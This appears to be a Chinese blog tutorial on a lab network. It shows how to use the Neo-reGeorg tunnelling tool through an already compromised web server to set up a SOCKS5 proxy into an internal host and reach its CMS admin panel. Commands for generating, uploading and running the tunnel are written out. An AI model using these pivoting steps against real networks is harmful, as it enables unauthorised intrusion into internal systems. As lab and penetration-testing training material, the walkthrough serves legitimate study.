您当前的位置: 首页 > 

星球守护者

暂无认证

  • 9浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Neo-reGeorg通过socks5一层代理,访问内网系统-实战篇

星球守护者 发布时间:2022-10-09 22:29:19 ,浏览量:9

文章目录
    • 0x01 网络拓扑
    • 0x02 背景介绍
    • 0x03 代理配置
    • 0x04 测试连接
    • 摘抄

0x01 网络拓扑

假设:目前已获取边界服务器(192.168.0.103)的权限,远程管理服务器 实现:通过Neo-reGeorg,使得kali能够访问内网的192.168.93.40上的主机 在这里插入图片描述

0x02 背景介绍 主机模式IP网站名称备注边界服务器windows server 2016桥接vmnet 4192.168.0.103、192.168.93.129文件管理系统假设已经通过文件上传获取服务器权限,进行远程管理二层网络windows 7vmnet 4192.168.93.40大米cms系统 0x03 代理配置

第一步 下载地址

https://github.com/L-codes/Neo-reGeorg/releases/tag/v3.8.1
https://github.com/L-codes/Neo-reGeorg
git clone  https://github.com/L-codes/Neo-reGeorg.git

在这里插入图片描述

第二步 kali本地生成代理脚本

python3  neoreg.py generate -k 654321 

在这里插入图片描述

第三步 上传到window server 2016服务器上(假设提前已经获取边界服务器权限) 在这里插入图片描述 在这里插入图片描述

第四步 本地kali 启动代理脚本,

http://192.168.0.103:8080/cms/admin/tunnel.php
python3  neoreg.py  -k 654321 -u http://192.168.0.103:8080/cms/admin/tunnel.php
开启了本地的1080端口的socks5

在这里插入图片描述

0x04 测试连接

第一步 kali本地添加socks5配置

socks5 192.168.0.107 1080

在这里插入图片描述

第二步 访问 内网主机 在这里插入图片描述 在这里插入图片描述

第三步 使用burp代理获取数据包 firefox设置 在这里插入图片描述

burp设置上层socks5代理配置 在这里插入图片描述

获取数据包

http://192.168.93.40/dami_5.4/admin.php?s=/Public/login

在这里插入图片描述

第四步 进行文件上传(假设提前已经知道文件上传点) 进入后台 在这里插入图片描述

第五步 使用代理,开启远程连接工具 在这里插入图片描述 在这里插入图片描述

摘抄

有句话说得好:睡前放下一切,醒来便是新生。 无论前一天有多劳累,只要晚上及时休息, 保持充足的睡眠,精神就能得到恢复。 第二天醒来拉开窗帘,让自己沐浴在清晨的阳光里,世界就又是全新而美好的样子。 我们不妨从现在起,为自己制定一张作息计划表,并按照计划坚持做下去。 相信不用多久,你就会发现:能规律生活的人,方可控制人生。 ---------《作息规律》

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0379s